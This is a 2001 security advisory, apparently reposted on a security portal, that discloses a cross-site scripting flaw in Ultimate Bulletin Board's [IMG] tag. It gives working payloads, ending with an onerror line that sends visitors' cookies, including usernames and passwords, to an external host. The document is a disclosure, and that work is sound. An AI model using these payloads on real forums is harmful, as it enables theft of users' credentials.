[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Ultimate Bulletin Board

Title: Ultimate Bulletin Board
Released by: Scott Ashman
Date: 21st February 2001
Printable version: Click here


If a user has info stored in a cookie, replies to a message and is using IE 4.0+  there is a way for a hacker to trap his IP / user name / password / other cookie information and send them to an external source using your UBB code with HTML *off*.  There is a way to do this by simply viewing a message as well, although it's obvious something is going on as it involves a redirection.  Here's how it works :



Apparently the [img][/img] tag allows non-spaced javascript to run.  You can

write a line like this :



[IMG]test"onerror="alert('test');[/IMG]



This will run the javascript alert when the image 'test' fails to load.



Your cookies can hold both the username and password but is only accessable on

the

http://sitename/cgi-bin/ path.  Script running on anything in cgi-path

(replies) can access it.  So

[IMG]test"onerror="alert(document.cookie);[/IMG] will pop up an alert box

with the cookie info on a "reply" page as it's displayed in the thread review

at the bottom.



You can reassign the src of your image (this.src) with document.cookie tacked on

to point to an external page.  The weird thing about imgs and http requests

in general is that your destination does not have to be an image.  So  will actually try to access index.html.

Hence, you can add actual passable information to an external cgi or whatever.  On the external page all you need to do is either watch the logs or have the page itself

log any URL variables along with IPs coming in from the request.



The final line should read something like :

[IMG]test"onerror="this.src='http://xxx.xxx.com/page.cfm?'+escape(document.cookie);

[/IMG]



(Pasting this line [no spaces/crlf] in an mesage means that any user replying to anything in that thread will cause their cookie to be sent to an external source)

 

Scott Ashman

Jaspin Interactive www.jaspin.com








(C) 1999-2000 All rights reserved.